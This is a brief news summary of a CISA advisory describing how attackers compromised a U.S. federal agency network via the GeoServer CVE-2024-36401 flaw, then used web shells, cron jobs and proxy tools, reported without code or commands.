CISA Details That Hackers Gained Access to a U.S. Federal Agency Network Via GeoServer RCE Vulnerability

CISA has released a comprehensive cybersecurity advisory detailing how threat actors successfully compromised a U.S. federal civilian executive branch agency’s network by exploiting CVE-2024-36401, a critical remote code execution vulnerability in GeoServer.

The attack commenced on July 11, 2024, when cyber threat actors exploited CVE-2024-36401 on a public-facing GeoServer instance to gain initial network access. This critical vulnerability, disclosed on June 30, 2024, enables unauthenticated users to achieve remote code execution through “eval injection” attacks on affected GeoServer versions.

Following initial access, the threat actors established persistence through multiple techniques, including deployment of China Chopper web shells, creation of cron jobs for scheduled command execution, and attempts to escalate privileges using the publicly available dirtycow exploit targeting CVE-2016-5195.

The attackers also staged the RingQ defense evasion tool and utilized the Stowaway multi-level proxy tool to establish command and control communications over TCP ports 4441 and 50012.

To read the complete article, see: Cyber Security News